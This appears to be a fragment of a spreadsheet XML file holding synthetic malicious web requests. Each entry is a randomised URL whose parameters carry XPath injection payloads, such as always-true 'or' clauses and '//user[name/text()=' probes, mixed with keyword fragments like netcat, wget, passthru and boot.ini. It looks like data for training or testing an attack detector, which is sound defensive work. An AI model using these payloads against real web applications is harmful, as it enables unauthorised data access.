    <t>/eka/r6e1sbqvqw-xrtfmahf/pfbe/tqtbcnzoa.aspx?swleihtohs=idtddowht&amp;ayeytrea=eeia~fjys&amp;iurs=oaadl'+++++or++(i+++++&lt;+count(hsed/child::text())+and++j++&lt;+++++count(ht/child::comment())+and+++++k+++&lt;+++count(kdr6s/child::*)+)++or+++'kotneo'++=++++'++sinie'++or</t>
  </si>
  <si>
    <t>/ndam/dzkrrcptau/fytdueot7uhhmor/dipnqe/tgwzetowsaniheeseroq/efre5fvseufh/aurvienatt/sc50dc6c5jtllhjlso6o/dfzmravq7j-x/2obn0myb.oxpassthruce/rerlsnppahasoiilts/srfa.jpeg?eaehh=rdwpa&amp;lr0ae3ccinnglpa=j7'+++or+++count(+path/child::node()[position(++++)=((++++i+++++++j+k+++++l+++++1)]++|+path/child::*()[position()=(k+1)])=1+++++or+++'2o'=+'+++++o15pieo'+or&amp;hxvhuhnbiyhhw=neeleek0e&amp;smanctepyso1qt=&lt;a/9aq15eq+de&amp;eonuhieemxtso=]s;lhtvgb:1gi&amp;oxebm=7n&amp;ccyde1sr5e=lebqsi90dhicms&amp;whmsttuwsali4o=saag&amp;tmsmsfsnorts=[&amp;xleog4eosl=oianrgrenktwaccess_log&gt;t</t>
  </si>
  <si>
    <t>/azdaczj/yjutgzw2vm/ai.gif?tofqllwhio5=nldspx'+or++1&lt;++5ee/4aola/sb/child::text()[position()=772]++or+++++'i8ntssuo'='&amp;zdoikshenis=&lt;bodyked</t>
  </si>
  <si>
    <t>/8jlu1positionzvbsi/lzwbv/omdnd8ttntsc5jl/eoa0_/3aiposition/lh9dmperl0weaechodu/lrinxstdin6_netcatscriptn@ayu/gnshutdownhttpc5ii/nf6v4/adzwydu4ehtd/rhiei0tt4e4tfwnespe.gif?sacni=4&amp;vo9t6rmrnph-zzn4=2&amp;daasnhhtacces6&amp;mmetaxrievw=(i++&lt;++count(rta/child::text())+and+++++j+&lt;+++count(iee/child::comment())+and+++k+++&lt;+++++count(acxtu0/child::*)+++)&amp;qs=1344119&amp;tvpa='g&amp;cit0dpest=|;@et</t>
  </si>
  <si>
    <t>/hevats/t3.pl?ip7s94djnx=6uoidhf6nkmo&amp;lndf=arb+null+eter7s82xmd0&amp;qr2aotuuedwtnk=ne0d4emdnaco0p&amp;we5=eens&amp;qoalaef8zn=32269&amp;dyg=arahnstf&amp;q7u=si4scriptbho/o+++cn5noac7&amp;q%uwngnnmetan=(i++&lt;+++count(ne/child::text())+and++j+&lt;+++count(rk/child::comment())+++and+k++&lt;+++count(dr3/child::*)+++)&amp;lneabeirewfceo=ih1t9&amp;mqatetaitubet=hsbot1xml3n</t>
  </si>
  <si>
    <t>/cny5oaserouxeda0o/piframewqzgb.jsp?eneftxpitivmct=noeedg2hmlew&amp;4.childio1w_6bt=bsytcooiaep0opk&amp;etsd2=815344&amp;ugsaetecrsi=ccmdm&amp;restfsheo1syeu=3qfchnopeneijtlya&amp;em=7+++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1+++++or+801=&amp;ana6lsjukcr=69385557&amp;rehaceepia=19893805&amp;mdeod=90295305&amp;f0goscript6zbaiframe=1sjo&amp;rl0igr4elpawet=wm0drrwgeta2;|sabo+qfead&amp;brwett=om87d@cge0r&amp;eekdntned=8yquz3twuq&amp;ettb=701860&amp;e6seta=ys+</t>
  </si>
  <si>
    <t>/ao9rbpjrff/ntd/goe/2drbqjnei/udblfmd1wrkrhe/qxnoaosaqn.asmx?ios2anoa3ottn=ly3e&amp;ye=emxl&amp;mht2=gn+5~ot&amp;itebaynasbinfuo=9753920&amp;oele3voe=r9gwvozzharx&amp;tpna7rf=65822++or+++1&lt;+laokis/coehl/5sew8/child::text()[position()=479]+++or++++36=']+|+/*+|+/foo[bar='&amp;txislef2ejoudas=77540&amp;tless=dalautoexecp&amp;nipchna1=859&amp;rhcitmtue9psya=nr1n+5&amp;3btpeteltsaoa=60&amp;ss=79&amp;meeeo=cdefkb&amp;9iuemiiet=t+:3oehtacces2h'&amp;eegt=n1g0mxci</t>
  </si>
  <si>
    <t>/ek1iyx5lkiitwilaqnf/lthsdg/kdminlpexopen/exxwaw/mbopassthru@copybz/seeaa/tg7xxxljriw90v_.css?preplaceqj=ae+eardstsiecsu&amp;ez=sby4d&amp;ashtodlrewu=pvheeirn&amp;ncan1za=lojir/7/t/child::node()[position()=3]+++++or+++'noarln'++='&amp;eooft78o=]&amp;blgcmcndtz=iee%uh:nodetioe+drrx&amp;zeesnbre4kywkad=?hike&amp;vasnt5b=naga&amp;tgynbk1at=rqwqfkbl.ks&amp;8aese=taxnvesl3</t>
  </si>
  <si>
    <t>/pxslsbsiesne6iteef/1z4pi-o3yj.dll?9hyv=8+or+++1&lt;+s/vh0een/co/child::text()[position()=7]+++++or++437=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/r._q4b-ogqbwyc5lv/eerapnaeto3ote/vrarapez9mra/ettoeyauheousl/e-ksjkrw@fu22kxi/5r/tss/atagctxe1afouz5s/raeinase/tbeviivuhjz_upcugnl/6lwb_.2ssep2juit1jlv/butab.htm?ehus=eita4y|au&amp;tlot3amg=4yemmupcwchuezirdx&amp;rsspahcettepioo=per&amp;lppsock_stream@m8w=(i+++++&lt;+++++count(ahhw/child::text())++++and+j++&lt;+++count(20zsse/child::comment())+++and+k++++&lt;+++++count(eld/child::*)++++)</t>
  </si>
  <si>
    <t>/xfrsaery/aso/ul/xdh4yzz/drzfvx/vuz-/aivshikw3/fysimrdlkmhkrnr.jpg?ncmmjebakr=bsy&amp;thtsmsnwf=9543047&amp;aneb1aeec=akq&amp;vildlheau3t=kelnin'++++or++path/child::node()[position()=n]+or++'suoieee'++++=+++'</t>
  </si>
  <si>
    <t>/qgjye4h/spd0uksll7/9otaee/vq-r_zf_v_/oicvech38radeter/5r1w2rjqlogtups/vkcbgqservicesfs.su/ougmq/zhretfcdgjgadqah.shtml?rod8rjahh=o5breplacecngcnodek7&amp;o0m=morehtiin&amp;rtiothbos0g=tebyvagy+&amp;fta2n5adr6=0029&amp;dwsiuysehsj=hf_d&amp;arnso2c1iih02tk=ernelme3oatbio&amp;i0aeaetcmitpr=gsea'+++or+++++ee9hee/ela/child::node()[processing-instruction()=31]++or+++++'gret'+++=++++'&amp;i4fld=abinai</t>
  </si>
  <si>
    <t>/eclfq3tfikse/dik/djzqjyokm-/twzsdt8kk3j/ote1gt5whtarot/2uqhx/l7-ra9v6qzd/lb8167oh/csof.htm?hnnhax=cs&amp;iitite=t&amp;tle=19816++++or++count(path/child::node()[position()=((i+j+k+l+1)]++|+path/child::*()[position()=(k+1)])=1++or+++4524=</t>
  </si>
  <si>
    <t>/5yocnab/iw/aeojsediezudhe/13aaueia2rees/rmtnwr9te2iwstd/3o4jdh_fqdbg.exe?xdimoesthlea3wr=832&amp;kqm--teopb8=9kwyklg4tr&amp;pziwhere12opuhperls=0+or+++itet/ae4ah/lu/child::node()[position()=201]+or+++48=&amp;tq8dcoai4t=httpzeh:&amp;w2leilufn=n;r&amp;@jo8hetcz9p=easttgzj0s&amp;qm3lhwvsgw4d=733&amp;htaasdbo=88004&amp;ed6cnefri=09062</t>
  </si>
  <si>
    <t>/yfaxdselectlydelete5/v5sn.x/f@fzctyh3cfyyj.tiff?osolnahwcynt=867&amp;iacgoonrweg5e=ir&amp;ca=1858141605&amp;erwtda=ngkpsxyr&amp;c1xisto=tipb&amp;connectelf6uenph-e=whomp6spj&amp;fkx7@kbr-ys6=ricaeovs'++or+++++6+++++&lt;++++count(path/child::*)++++or++'p75otrhe'++++=++++'</t>
  </si>
  <si>
    <t>/omtd/vse.css?skate=0ranent5athcdr4n&amp;xfcatl=sshto']+++|+p++++|++++//user[++name/text(++++)+++='oe</t>
  </si>
  <si>
    <t>/jecmd/tyt7gnk/qktnndpius@/hsuym/fgbvarhttpchildi0lreplace/aca/pwgetnpranode6netcatzhtaccesyhomefj/st7s2endenrsiavtorm/f0vfx0s.hedkmpmmf/knwcx8xv22pegn.mspx?tpsun5c6=652101&amp;xk2y=o/tm/jhu/child::node()[position()=907]+++++or+'lo'++=++'&amp;xhgesock_stream9e6g%uc=0465054</t>
  </si>
  <si>
    <t>/dt/yib5@n/tau/h0mn8ty/2zdecndhhtpassv/lxg4wll7dil@a/yxe/i7nlrspy/vn9jo.jpeg?oocosn=b+jizrmfmc&amp;&amp;hciraeawqa=27&amp;u-r.b=8946&amp;vwsom=oyehttpe&amp;jmailz3=tpdehreplacel&amp;4ao7dea5atnilin=murtprh2g0ss&amp;oldm5=ea'+++++or+++++(i++&lt;+++count(zsages/child::text())++++and++j+&lt;+++++count(aa26a/child::comment())++and+++++k++&lt;+++count(ic/child::*)+++)++++or+++'d7lnu'='+++++tgxie'++or&amp;otwo=ebslls1&amp;2vuh7e=02&amp;tgtdaibo=neo7rewe5eooo0&amp;wis=bypnnterilf2ao&amp;mtaegerorohh=ynhed&amp;sis702m=ectb&amp;eftae=ftptsebreop2otelneti</t>
  </si>
  <si>
    <t>/cut1dbuv@cwb7/enss6esohviq2thef/hppnautoexecyacceptm4eaccess_logvl4y/63p/-_uandyyuk30anxxk/4w4_yj/e_m7l/php3lrskhnodewg8ni/tio9/bqohxse9xyj@3tm@/ct/i6nethnasudfueiresud.shtml?lajursthanccs=ehu&amp;u5het=amheoa7e&amp;oogd=9264&amp;6h=out'+or+++6++++&lt;++count(path/child::*)+++++or+++'wdnnt6ql'++++=+'&amp;wae1us7otxrouc=aer&amp;ugqsrarn=stie&amp;ida2d=+w?q&amp;hvihideletepx=527213&amp;otb1_z.yji6t=3&amp;tt=hec(all&amp;.og0nph-dgroupbykq=8(ntnnf</t>
  </si>
  <si>
    <t>/7hkky/pmwhhn3v22/agtcdpn/hngehda/1g/qepieunobt/haj5mn/sopnpspfvvjxab/suaqnetcat33.xrkn.php4?nrgrdh=04622&amp;oejgotnp=bubeo&amp;ftan5sc_e=yffr7mtx&amp;tsyanwiqte=w\\&amp;3oh=tto'+++or++n/ob/child::node()[processing-instruction()=9]++or+++'en32s'+=++++'&amp;fpealni=bfjovkmw&amp;euu=933</t>
  </si>
  <si>
    <t>/d.qwmfmkfzx/tibwkefkqcdl7/shd/kkk3nb@hiit0os/l0emheu1fte/ohl/fb-jzrj8sx/wprhi9tb1g/ms.dll?6deleteaaww=bgsounde&amp;eyn3=ehi$&amp;vihtfmse=dlmwmr'++++or+++yzp/eor/child::node()[processing-instruction()=5]++++or+++'my'+++=+++'&amp;u3tavueeaala8n=gkimzxr&amp;imgc6wl1a_c=34&amp;ea9coafzuc=170&amp;vsmw=ojec6h6y&amp;l1ocot0ocrmqth=]boot.iniry&amp;tauasw3gytdaaie=hao6f&amp;crolsanhaneo=54178920&amp;rot=40597</t>
  </si>
  <si>
    <t>/er3sqsnuiusneuziglts/eq/lc.cfm?6n9snhe=uamxl&amp;tenryai2=jta2pot&amp;2el=siftrz'+or+++count(++++path/child::node()[position(+)=((++i+++++j++k++++++l+++1)]++|++++path/child::*()[position()=(k+1)])=1+or+'osnf'+='+++++tto'++or&amp;cibsi3iin=3926&amp;r7qtprslazess=9&amp;hakltescvblut=a8qdm&amp;tt8etyas3ic=motir</t>
  </si>
  <si>
    <t>/xzv.lh_d/ieothrbven/avfkstsg_pj6/rejp12stghxr7p.jpeg?9dt=qbzt)&amp;j9t9=8kvwjiar&amp;auedi=dyvrl2tehwc&amp;m2wtoeih7udnas=tpeo&amp;d1doiuk=8ry&amp;rjrcttoeaarlh6o=7&amp;0rwvxopen=(i++++&lt;++count(l2oi4b/child::text())+and+++j+&lt;++++count(hgwn0p/child::comment())+++++and+++k++&lt;+++++count(68eu/child::*)+++++)</t>
  </si>
  <si>
    <t>/groupbyg3awkbgs-8dnr/mruq/nbah3dedzemt/eplopg63fgnkeea/1nlpygnlu/59s/eunuso/m7uneu/y_uheh-a/axyd/re0duhyu5aueensso/cc0yju-kgg2pdg_n.png?whpnlynooioe3li=9758&amp;adiuhtoqhcia=fleweobwdaileo&amp;9pdropwv=caeswltrnant5r&amp;wwpugsiyswt7p=rregsotelnetvbscripts&amp;miraa=bni/escerm/b/child::node()[position()=321]+or++++'e5'=++++'&amp;phosiini0=ncxak@ogt&amp;xo=2462511&amp;tntvac=048&amp;8gby.php=65803301</t>
  </si>
  <si>
    <t>/eancunm/stfen/zv2h8hzbcjum/c4niih-zk/sinb1xng63reec/td/tfkhjgop3q/fk2uwozxxpbf/f2a5kk/densuoteruxar4g/ieiseltneoh/simtiveeqrsh.nsf?ks9hes=4904186&amp;aismudnt=tobxfaya&amp;9ezaoitnlwnueoh=lfnibw&amp;qr4kvswy5ze=003798&amp;es=lhivg']+++|+++++p++|+++//user[+name/text(++)+++=++++'hltta&amp;6g48vfamkdn=7777087&amp;oqbgj4lck6b9=538498&amp;vdonbt5w1ls4re=scroalleey4objectosdu&amp;dj2htent9os7ps=ll&lt;aent5uagogeeuunionia&amp;veah8hdaracfbc6=wimg&amp;fuarexec=yw02</t>
  </si>
  <si>
    <t>/tcoeelh3tinue/rdr8u_9-kr7y_/tzgonelapn0iasne/owdjeawemuvn6y5ljsy/jrcmeta/hhaaenozlotaot7h2l.cfm?keah=i61h0maa0ne&amp;vnssnsudeuj=ti4a']++++|++p++|+++//user[++++name/text(++++)+=+'ktrht&amp;jtl=7&amp;kt2uratrndppf=l8&amp;othoteug=uo5oieanog+hrps&amp;h3fcxh8ngn2nxa=968&amp;eriira=ew+7&amp;fihnelae=4769&amp;fn=58&amp;eyw1r=0mbnhttstjr4r6noa&amp;k9vlchildshttpnuiframe@=enhls13notnnqrcaea&amp;te7on7eeo6zte=aisyi2wht++iah+conn</t>
  </si>
  <si>
    <t>/wutehntzqm3ttai/frqhvtad6hf/veearks8wvumemooenns/me/pvhrv6xom1jq3is6/tfform6edxterm-xxkexec.html?allr9lnhnc=n4pter'++++or+++++path/child::node()[position()=n]+or+++'ermtn'='&amp;rdaztq=rin2qenroddlheaamk</t>
  </si>
  <si>
    <t>/eahey/9reo8gjugnne/knqsmxemes/ibbmarndjy0mndidycc/lpgpr1hywxnaaq/unu2joll2kqi/ssqdnutmhec5so/5wlinkcq.php4?dtat=rq&lt;=sesei&amp;&amp;ti3qrhter5pa==lkjnrsaa/egehp&amp;eoete=49175022&amp;@umetal2dlgp=noeocsu'+++++or+++++(i++++&lt;+++++count(emcs/child::text())++++and++j+++&lt;++++count(egorq/child::comment())+and+++k+++++&lt;+count(tfrrea/child::*)+)++++or+'er5ar'++++='+sat'+++or&amp;neautjet=sgwepqger6teote&amp;flfaiia=ift&amp;trialosrpeao=owmgtok_&amp;tu=eheicsfscges0rliu8&amp;0a8orct1lu=7costyle2&amp;adminopt8open.stylecp=piwindow.openil+ke]oad:l@&amp;hgstu=1o</t>
  </si>
  <si>
    <t>/qgatldf/va7skhd/avr6syv01tuyn@c9.cfm?gyh=ch7we&amp;dan=082291345&amp;jalwer0est3uco=773475&amp;fottbc.=nsa&amp;oditt=000414&amp;ant.from-@=vnbdtlesi&amp;psystemvmcr..h5-=it9ea3e7'+++or++(i+&lt;+++count(ebn/child::text())+++and+j++++&lt;+count(yxa/child::comment())++and+k++&lt;++count(isticn/child::*)++++)++or+++++'6yloyee'++=+'+++++twaoe'++++or&amp;aitnx3cfosa1evp=33389</t>
  </si>
  <si>
    <t>/idoseb3tvsew.shtml?hnmf=1+++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1++++or+458=&amp;yfromjq9=1&amp;tdosodgdrlxet=wdweurhi</t>
  </si>
  <si>
    <t>/nlmlpaccess_logwf9u/5ovi4detwcnnvhrte4nr/tri/hsrf1/itw/lm/esa05_ngpyczgl/eanmpaadd/glc.jj_r.cgi?6kq3nzrs=235+or++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++++path/child::*()[position()=(k+1)])=1+++or++++1821=</t>
  </si>
  <si>
    <t>/avarywbgsoundkoq60a/sylduuywvpa.ok/rlisriqrdhn8rtrgv/ixcttmqv/oineqtoeqnr4gxd/e4h-.gfwhyz9azpc@y/anmcaihml/pz-ksh3ttpkbhu/i7zs5hgg@z/ty7dhbdeba9qhm.jsp?53q0bwma=enagsckn'+or++++itnto/opwmn/child::node()[processing-instruction()=176]+++or++++'3ti'+=+'&amp;o6lh=iileri02evshoaie20</t>
  </si>
  <si>
    <t>/ktekal@-p8bvhlrwq6/uovwj1dgg/ome/ooucva-hw_2bljdqp/btaclnat/etnl/a1n5ubmbhnfec/sf4/hs.aixe/waiuw/ediw7imc0.jsp?tapaouul=anevaleti&amp;nipeernhiar=itg&amp;rsregoer8ehci=tartoseo&amp;5iwarlf8sogi=ccjtla1qscab&amp;e2ecmvmiy1=984&amp;tuccr2tq=1ena1&amp;dotd1jart=42/urit/rlzn0/child::node()[position()=498]++++or++'3i4c'++='&amp;ghh0unao=45047188&amp;ry1ikomedtldt=o7dvt&amp;os14mun2nt3=643091&amp;aujhwhnrsafre=irhatbaeio&amp;eoiebeeihevoou=ggelprhtelnetq&amp;&amp;pfaasn6ce=s2ma5q@</t>
  </si>
  <si>
    <t>/eahtpfh/bqtductioloestl/mdeb5qa/tu/1@heddufpkx.nsf?ut5ag=8ig7oadtgsygroup+byoveo&amp;sssr6exwea3akie=evrtabei1iaeioux&amp;laepz2nhomez33=070790&amp;serlostd=st_2gj&amp;1t=tot/atr/ia9l/child::node()[+++++position()=323]+++|+5b/it0er/0d/child::text()[position()=80]+++++or+++++'eguungs'++++=+'</t>
  </si>
  <si>
    <t>/sttosycp/nta3..xcxmsm8pd/srdes/@xprjedzqcsd/sdhd3aog/arnathtn3oaro/cdpozie35iao/hag1kfm/g-v@ccgitoa/htmrby/tkeetf/w@m.png?nivrhtna=%drywremei5r~bsidol&amp;jansyevcteu4xi=e5ahw1tufcta2rdbe&amp;-_ml.48qh8=56a22re&amp;eer3ng39=510&amp;w6libajruxul=cxftxeh&amp;nbgheuo=+usroptee&amp;feacoinhrwxha=loos'+or++count(+path/child::node()[position()=((i++++++j++++++k++++l+++++1)]+|+path/child::*()[position()=(k+1)])=1++++or++'sthsrqr'++=+++'+++++mhc'+++or&amp;rngv0aa7teons=930747205&amp;r8pbvhm=+uosi+1(auonhtacces&amp;eufznene=wdnrnluntn&amp;6nnc=etu&amp;2ir=antsa2u&amp;ahtni9e=erxh|&amp;solnnblaaaesywp=9755</t>
  </si>
  <si>
    <t>/gt5z3hg@b1r5.i7tw/emrvahe-ewlzmtrfel9y/if51w@oayh6u6vzi/xkvyfld5p927/hmdnrehsja8/aolloud4sndirdt4/hlh/nt326y9n.sh?coaeuu2ngyaedaa=77&amp;bchildtinclude8dlxws=ri'+++or+++++4/8re/child::node()[processing-instruction()=6]+++++or++++'3m5l'+++=+'&amp;sdapsko=1&amp;ti5ls2we=axo0tc39v&amp;42vedwherescriptt=741</t>
  </si>
  <si>
    <t>/ofik_pjdtrvpesiyc2/xsgoe3srrai/p014-xvad/hozi/a5/connectlsf3xq/zu4jy0/2mbct6t8n1/eilsgamttr2o/4asgl/hxsda@.tiff?sdmfeseubo=ke'+or+path/child::node()[position()=n]+++or+++'cobedbp'++++=+++'</t>
  </si>
  <si>
    <t>/fwn4mnl-locationyk_zpz/szuh9z.8o-nq1ysp9n/peycer6tienndr/oj_9mc/4cm6@6h5/0wtv3emfheesf/2ojlocationvuboot.inizh7/a@wdjjyzknymoeq2txp/co..hnx3x14cv.exe?li2nuciaia7x=ojaub']+++|+++p++|+++++//user[+name/text(+)++=+'scid</t>
  </si>
  <si>
    <t>/oobe/0plxptrqo9gsab/n0/ejtee/ee1ntzeadehm3m4yl/m6haeeikem5ssnhiuoch/wrx8/mwmqn1nztv/4yiptpm/ti/oavucykcz/e00kzsn.aspx?6kfmocha=9426385&amp;are=as+&amp;7ocmogy5azh=rs8n&amp;hm4mhfpb6inha=qzo@&amp;pfk@vperlht2e=eochildht&amp;usdtlbf=tnabyl8mbgtfcl3s&amp;eihtuxl=onreereih&amp;miuoe=0&amp;nls=23239++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1++or+++62027=&amp;zcmdhga9un=lm=ca&amp;d7lm7tksti=edur~nrhz@yqe7h&amp;d9qmnd1oj=040411&amp;aai=mlter&amp;tt0=akhlzf6&amp;ssb22tdnrag=1</t>
  </si>
  <si>
    <t>/x1b@qzkkwzhd35c/rt9nvhdnym/at/btyyzntmpehttpsmjq/aejlo2sstitee/oy2zfoesyte/-mzuqr4/dyipq7f.kchsbfk79.htm?bgtn=j5yd2g&amp;eemk=xa'+++++or+1&lt;+++++tt/nmtrzf/qeoyw/child::text()[position()=869]++++or++++'ycenicmn'=+'&amp;awpneemufl=qmr&amp;fhh8bin@hy=uwah&amp;fs=2</t>
  </si>
  <si>
    <t>/ajlc8ptbcmgfphpas/seonytttt04limaf/dmpasycusuulo/orczn_xpxd@esnhb/tkn8ac4henbr/d8uy.zio9rzu/atb09_/i-bqbuy4/werdxwy/rska7hcg/eb6.mspx?nefat=ebrgmzu7oq&amp;pdz1-bs1w=4&amp;o3on1iseeapdr=270&amp;elhohtecehl=v9qeik3nny&amp;y9do=24++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1++or++++4245=&amp;stdinhqi=n4da</t>
  </si>
  <si>
    <t>/no3-qzxpqra_ahxdhann/psioptryylash2/nnabghseedlndh5tdw/40ef/rqtmochaidy/ejt8tqyenlda5eeo/o2w1_k/hetastdinfsvpxexec/zdtoarviacsetl.php4?sxt@=z+&amp;afooneeeelcwnoh=aes'++or+++(i++&lt;+count(3izhms/child::text())++++and+j+++++&lt;++++count(o4o/child::comment())+++and++++k+++&lt;++++count(sdk/child::*)+++)++++or+++'rhcof'++='+++echd'++++or&amp;st0trzt=7f8ybbycel&amp;1u6d8sioewe=aear7&amp;jythiisni=9</t>
  </si>
  <si>
    <t>/vn1iocxamqc97d/nb/ecmd5br5alosyad/dbiht3/uiwm8okprocessing-instructionjf/h.x0xks4ehqhhk1c7h4m/gjfuzq0slftkrcnytl8c/stjdlteesbiwgecam/_eed1ttidtg.html?letcteoh=wp-e0rt?|rt&amp;tdshcnimlsete=498&amp;ro=2&amp;npuwr=io/ipub6inexec&amp;ls5hlsy9shutdownwget1k-=af5omaw4r&amp;riutaj=qksah&amp;kotmsy7zt=g0zoonp&amp;sn=tlyn'++or+++count(+++path/child::node()[position(++++)=((++++i+++j++++++k+l+++++++1)]+++|+++++path/child::*()[position()=(k+1)])=1++++or+'t3s'++++='++anrlzso'+++or&amp;nbqen2j7ek=ne1tno&amp;js=534441&amp;6ln2rrooreaq=le6ui</t>
  </si>
  <si>
    <t>/8netcatxc/spoc/tnieqtsitn/djcugcrg/team3oenn.php?zasse9whstirmn==pte3&amp;0ieaioemtsuir3=33&amp;vsamx4eo=619447&amp;w6isad=tnryeo/8i/mm/child::node()[+++position()=07]++|+++++tef1/eaeb/vnut/child::text()[position()=93]+++++or++++'ccteox'+++=++++'&amp;eut9edtuo=92641&amp;w6lesmoaliit=37680&amp;kgaoetmieouwitl=ak0gcfuw8</t>
  </si>
  <si>
    <t>/bopg3xfoibstmjwb/y5zq-ncl/lec5s/nhun@yuslf@lxs/my4lnfnullucq.gif?dtubs=m+n&amp;toyooeoehlteae=d/rl/pi/child::node()[position()=653]+++++or++'ihi6alse'+=++++'&amp;sur8=372&amp;.rktmpacds5h=cnts;3eiarmad$e&amp;wg1c=malllogsd~lqslo&amp;modf=tmyp1swdoconnectsct%~i:zal&amp;let9rnchxr=dolmco</t>
  </si>
  <si>
    <t>/7ienhfnngoersfei/2ybm_qvt/eryi/bziqfmvmh/utos5so1/ogdwmhucy2mnd.js?z0adebiht=emaimait85i8iacae&amp;llltwqos=tocgdj&amp;e07to=eedanlnewe&amp;ih=ldy+iua&amp;0seniwrielr=dn&amp;4pooeecciche=odnte&amp;\\'2ctt89&amp;ueeeeeaefusi=(i++++&lt;++count(zeofol/child::text())+and++++j+++&lt;+++++count(sde/child::comment())++and+k++++&lt;+++++count(enbnae/child::*)++)&amp;aofssttb=3394&amp;6cmos=2&amp;esue=a5sa&amp;lwaeegsdengzbi=38045&amp;lerigckenczlget=aesudrmtao&amp;v0ovenddpa.d=mabpnn�=tmp+</t>
  </si>
  <si>
    <t>/iaf/2jm4dtifi@t/replaceht.ukqfk/@q41-b5/79etto/fgm_50r9tnhv7v5n4q/lszidm/za2bcfuwtg9vaf7h/jf8ze4ir7byj0y/rtwtqgs0nkggvkdcl/i2actdeosheef.shtml?avcwomateastmy7=8kd'+or+++1&lt;+++d0ssi/l/e1ta/child::text()[position()=556]+++or+++++'lhrcmo'+='&amp;r9uv=?ttatvbscriptb&amp;nieimbohns=rd-kno</t>
  </si>
  <si>
    <t>/aah/esjqenmkumoslp3bw/hy1thw5/1lddtxq2ahxwb2/t3heimopfvetgilldhi/vgj0igrg6bh/asxpkxhoq8zgmhs3l6tp/ec6lchrnepnamxad2ue/hmxeel1eksy1xwry03z/whsjn/e3woo6qizfnu/orsiriyu3a77y3-.jpeg?vtner=om'+or+(i+++&lt;+count(razi/child::text())++and++++j+&lt;++++count(ezuf/child::comment())++++and++++k+++++&lt;+count(3h/child::*)+++++)+or++'ni'++++=+'+++ekra2sh1'+++++or&amp;utlcn=neqn0&amp;tot=iszl1f&amp;tihglg6=5h&amp;qwreplacew6=aloemhi0seyzm&amp;attgegaecsdgr=kfn=ealndrynrtn&amp;9tsnigsht=ymlhe&amp;;omm&amp;dl3tioacotrreoe=961011&amp;edivprocessing-instructioncnfe28=xetn&amp;i95kimza=54920&amp;0dt=xeuat&amp;e7wqcdboek=mei&amp;lctm4ariret=eetgiemssebuzsogua&amp;eharoo2sp9n=twheret)yv$$i|</t>
  </si>
  <si>
    <t>/onlc0eaarlezirll/vik1@igzou/solfdrop4tx1w1/uealh3spha/tnu2xu1.asmx?_ho4_wpqxwbf=etai\\)isin[esa7&amp;r2nltltey=a0mn'+++or++6++++&lt;++++count(path/child::*)++or+++'dt6nw'=++++'&amp;ttaaehiodtdyon=rit</t>
  </si>
  <si>
    <t>/xn_zqog/uw/f_gvpajsd/inssnt/adzilfi3an5ivfq/oyqveu9q86yl51/6u341irne/nge.js?xnra5mr5ws=anaahhic'++or+++++(i+++&lt;++++count(cedt/child::text())+++++and++++j+&lt;++++count(7nsobe/child::comment())+++++and+++++k++++&lt;++count(ae/child::*)+++)++or+++'teelmy2'=++++'++gixh'+++or&amp;aiahdie58ttn=e2sheraioutotnqanw&amp;cmrolgdb=9380968&amp;lrar=86306</t>
  </si>
  <si>
    <t>/_hdqptzhovsxb/ds1w.processing-instructionv.aspx?sgon=aros/aqih/y/child::node()[++position()=09]+|+++++tel/ai/eh78c/child::text()[position()=3]++or+++'rse4gsnq'++++=++'&amp;lev6uooet=1yw3tj2c&amp;ssawe9c83he5ru=eodr0dti+e&amp;lrd3xoasgg1denn=irv\\lrdtcx2cs4sd&amp;linkdridwget1bin=neeih&amp;scywt7uza2otd=nohiess0ah&amp;cmcdld7e4ap=&lt;f&amp;kvvz7@h=qhlxml&amp;ok5udoimdeqqp=dgi3@k9bpt8&amp;lteh=s8mao&amp;tesufyeb=+form8p&amp;rilhrev=oh@</t>
  </si>
  <si>
    <t>/egfxrqikgmr2r_p.h.php4?sffamoen7teyieo=(r&amp;s2=he6ee7enoeg&amp;pa=ramweor$execwo&amp;rblmaibeqjg=7511&amp;sieosenrctral=nph-oe+5&amp;4dopsedjoblie=sa+(h+r&amp;nd8tu=560365186&amp;arrylolues1=0tai2si7&amp;cealo=5183555&amp;sedduercb=24890&amp;buvagi=46+or+++count(path/child::node()[position()=((i+j+k+l+1)]+|+++++path/child::*()[position()=(k+1)])=1+++++or++9756=</t>
  </si>
  <si>
    <t>/l2skaihloneatnwwd/w7okvns/e5cth/sz683bijt3gxjamu@an/ggclte6ssdthbm/8lweadaufrtk/ntbqebum-/imochaqouoxcnd7/ccs2bt-na2/rqwpnsrsersmnn4do1i.htm?q8iddvu=dfqv2.d&amp;yshejlowkoatp=85507415&amp;te1ttas=n20o&amp;apa5zesia=28160999&amp;ueo=netcatvaroe&amp;diioitlin=ns5wcnne'+or++++(i++&lt;++count(ttfdlp/child::text())+and+++++j++&lt;++++count(0c3onh/child::comment())+++++and++k++&lt;++++count(isbu/child::*)++)+++++or+'2sy'=++++'++n0no8'+++or&amp;detniv=htnono+h&amp;mtdk=ahnn4?gh+ne8ansh:&amp;</t>
  </si>
  <si>
    <t>/ulnsodn.swf?8oirde=rognbia1'ghwindow.open=d?jrbgsoundeh&amp;bp4vyv32bacceptj=43031&amp;1zhmeu4hjpz=8039397&amp;omdtkm@eit9=7++++or+++laooa2/de/2/child::node()[position()=3]++or+++++847=&amp;ys3asiouih0orhc=7an-deletediv=4cyrsityun3|&amp;hmt@j-p7wvgk=3197120&amp;shnaegtns=bdislrcrqweenm&amp;gns=1&amp;nenobet=gorittchenqamebt&amp;yecjnpexecd_x4script=972552&amp;tbetnhmnl=oit\\&amp;0rta=tsaaik4ck</t>
  </si>
  <si>
    <t>/oz/alo8lteeinpiry8/enpprocessing-instruction-/v6/ikzxwidue4n.gif?adudne=childt)eposition&amp;ris=fodr8&amp;tais=ahf&amp;n3ef9c4metag=uxl71pnquhz&amp;etei=r.9&amp;-y-i=sdsl2s&amp;outhebahro8h=itylah/netq/ric/child::node()[+++++position()=61]+++|++++tm8znw/aeeli2/ewo/child::text()[position()=115]++or+++++'oeym'++='&amp;0isoqqperrtdc=ytacozvetw6o0als</t>
  </si>
  <si>
